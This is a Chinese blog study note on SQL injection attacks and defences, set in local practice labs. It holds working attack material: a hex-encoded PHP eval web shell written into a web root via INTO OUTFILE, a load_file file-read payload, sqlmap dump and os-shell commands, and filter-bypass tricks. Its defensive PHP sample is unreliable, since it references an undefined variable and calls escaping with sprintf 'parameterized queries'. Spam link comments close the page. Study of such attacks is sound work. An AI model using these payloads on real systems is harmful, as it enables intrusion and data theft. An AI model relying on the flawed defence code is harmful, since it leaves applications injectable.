首页 / 笔记
发表于,更新于

sql注入防御

sql注入防御

SQL 注入是一类危害极大的攻击形式。虽然危害很大,但是防御却远远没有XSS那么困难。
SQL 注入漏洞存在的原因,就是拼接 SQL 参数。也就是将用于输入的查询参数,直接拼接在 SQL 语句中,导致了SQL 注入漏洞。
采用sql语句预编译和绑定变量,是防御sql注入的最佳方法

GETSHELL

hex(16进制)
0x3c3f70687020406576616c28245f4745545b2778275d293b203f3e
3C3F70687020406576616C28245F504F53545B2778275D293B203F3E
以0x开头,告诉计算机区别于十进制

select 0x3c3f70687020406576616c28245f4745545b2778275d293b203f3e into outfile 'E:/phpStudy/WWW/1.php'
select "123" into outfile 'E:/phpStudy/WWW/1.txt';

读文件

前提条件
打开my.ini在最后添加
secure-file-priv=
重启phpstudy
secure-file-priv限制mysql的导入导出
读取文件
?id=100’ union select 1,load_file(“c:/windows/system32/drivers/etc/hosts”),3 –+

sql注入探测

端口
3306
报错
经验
.php mysql
.jsp mysql Oracle

sqlmap

sqlmap -r 1.txt –dbs -level=3 -risk=3 –batch -p “id” –proxy http://127.0.0.1:8080
-u 检测注⼊点
–batch 所有选项默认
–dbs 列出所有的库名
–current-user 当前连接数据库⽤户的名字
–current-db 当前数据库的名字
-D “mysql” 指定目标数据库为mysql
–tables 列出数据库中所有的表名
-T “user” 指定目标表名为’user’
–columns 列出所有的字段名
-C ‘username,password’ 指定目标字段
–dump 列出字段内容
-r 从文件中读取HTTP 请求
–os-shell 在特定情况下,可以直接获得目标系统Shell
–level 3 设置sqlmap 检测等级 3

GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1
Host: 192.168.131.140
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

sql注入防御

过滤特殊字符,采用参数化查询,使用户输入的参数永远为普通字符,不会被作为特殊符号打乱原有sql语句。

$mysqli = new mysqli("localhost", "root", "root", "dvwa");

$sqli = "a'b\"c";
$safeinsert = preg_replace("/[\'\"]+/", '', $sqli);//正则过滤单双引号
$safeinsert = str_replace("select", "", $id);//过滤select关键字,可以大小写双写绕过
echo $safeinsert;

$name = "Jack";
$age = 30;
$gender = "male";
$sentence = sprintf("My name is %s. I am %d years old and I am a %s.", $name, $age, $gender);

echo $sentence;

//参数化查询
$mysqli = new mysqli("localhost", "root", "root", "pikachu");
$id="111'";
$query=sprintf("select * from users where id='%s'",mysqli_real_escape_string($mysqli,$id));
echo $query;

?>

sql注入绕过

大小写绕过
双写绕过
使用 ||(or) 和 &&(and) (使用时进行URL编码%26)
–+注释 +代替空格

注:

实际项目中,一般我们都是采用各种的框架,比如ibatis, hibernate,mybatis等等。他们一般也默认就是sql预编译的。对于ibatis/mybatis,如果使用的是 #{name}形式的,那么就是sql预编译,使用 ${name} 就不是sql预编译的。

标签: SQL注入, sqlmap, MySQL

许可协议

本文作者 , 采用 CC-BY-SA-4.0 许可协议,转载请注明出处。
上一篇 【漏洞复现】weblogic文件读取漏洞-vulhub-weblogic_weak_password

已有 8 条评论

添加新评论

  1. kflfekwbza kflfekwbza

    《时光之轮第二季》欧美剧高清在线免费观看:https://www.jgz518.com/xingkong/29284.html

    回复
  2. lwvbhmowjm lwvbhmowjm

    《反角度美丽》剧情片高清在线免费观看:https://www.jgz518.com/xingkong/111927.html

    回复
  3. jniungrkpv jniungrkpv

    《极地之战》科幻片高清在线免费观看:https://www.jgz518.com/xingkong/23746.html

    回复
  5. jwygmhbjdn jwygmhbjdn

    看的我热血沸腾啊www.jiwenlaw.com

    回复
  6. vrtjznmngq vrtjznmngq

    想想你的文章写的特别好https://www.237fa.com/

    回复
  7. nrxyzazrrs nrxyzazrrs

    怎么收藏这篇文章?

    回复
  8. velmlnbccg velmlnbccg

    叼茂SEO.bfbikes.com

    回复